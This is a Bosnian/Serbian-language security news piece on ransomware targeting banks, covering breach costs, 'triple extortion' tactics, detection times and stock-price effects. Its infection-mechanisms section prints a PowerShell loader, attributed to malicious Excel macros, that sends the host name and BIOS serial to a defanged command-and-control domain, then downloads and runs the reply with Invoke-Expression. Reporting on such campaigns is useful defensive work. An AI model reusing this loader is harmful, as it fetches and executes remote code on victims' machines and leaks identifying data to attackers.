U 2024. godini, prosječni trošak povreda podataka u bankarskom sektoru dostigao je 6,08 miliona dolara po incidentu, što je povećanje od 10% u odnosu na prethodnu godinu.
.webp)
Ovaj alarmantni trend dolazi usred približno 3.348 dokumentiranih napada širom svijeta, usmjerenih na bankarsku infrastrukturu kroz sve sofisticiranije metode.
Moderne ransomware kampanje koje ciljaju finansijske institucije evoluirale su dalje od jednostavne taktike šifrovanja datoteka.
Hakeri sada primenjuju višestepene napade počevši od izviđanja bankarskih mreža, praćenih tehnikama bočnog kretanja koje iskorištavaju ranjivosti upravljanja identitetom kako bi dobili privilegovani pristup.
Kada se jednom uspostave, ove varijante malicioznog softvera eksfiltriraju osjetljive finansijske podatke prije primjene korisnih podataka za šifrovanje, efektivno oružujući ukradene informacije za maksimalnu moć.
Istraživači Hunt.io-a identifikovali su posebno zabrinjavajući trend u 2025.: operateri ransomware-a prešli su na metode „trostruke iznude” kada ciljaju banke.
Ova tehnika kombinuje tradicionalno šifrovanje sa krađom podataka i distribuisanim napadima uskraćivanja usluge (DDoS) kako bi izvršio pritisak na žrtve da plate.
Njihova analiza je otkrila da se finansijske institucije suočavaju ne samo sa trenutnim zahtjevima za otkupninom, već i sa kaskadnim troškovima u vezi s odgovorom na incidente, kršenjem regulative i opsežnim naporima za obnovu sistema.
Uticaj se proteže i dalje od neposrednih finansijskih gubitaka. Banke koje su doživjele napade ransomware-a suočavaju se s prosječnim vremenskim okvirom otkrivanja i zadržavanja od 258 dana, tokom kojeg operativni poremećaj povećava štetu.
Pogođene institucije obično doživljavaju pad cijene dionica od 2,3% u roku od četiri dana od objavljivanja, koji se proteže na 4,6% tokom dva mjeseca.
Smanjenje povjerenja kupaca prati ove incidente, pri čemu istraživanje ukazuje na značajno zatvaranje računa u roku od šest mjeseci od objave kršenja.
Mehanizmi zaraze: Tehnike malicioznog softvera specifične za bankarstvo
Početni vektor zaraze za ransomware fokusiran na bankarstvo često uključuje kompromitovane šablone finansijskih dokumenata koji se maskiraju kao legitimne zapise o transakcijama.
Nedavna kampanja koju su analizirali istraživači sigurnosti koristila je posebno izrađene Excel dokumente s ugrađenim makroima koji su, kada su se izvršavali, uspostavili PowerShell backdoor:-
$client = New-Object System.Net.WebClient
$client.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)")
$c2server = "financial-docs-secure. Example[.]com"
$key = Get-WmiObject -Class Win32_BIOS | Select-Object -ExpandProperty SerialNumber
$encodedParams = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("id=$($env:COMPUTERNAME)&key=$key"))
$response = $client.DownloadString("https://$c2server/api/verify?data=$encodedParams")
Invoke-Expression $response
Ovaj učitavač prve faze naknadno postavlja ransomware korisni teret dizajniran da posebno cilja bankarske aplikacije i baze podataka.
Maliciozni softver daje prioritet skladištima finansijskih podataka, uključujući evidencije transakcija, sisteme informacija o klijentima i međubankarske platforme za razmjenu poruka.
Ono što ove napade razlikuje od opšteg ransomware-a je njihova specifično projektovana sposobnost da identifikuju i šifruju sisteme baza podataka koji se obično koriste u bankarskim operacijama, uključujući specijalizovani finansijski softver.
Izvor: CyberSecurityNews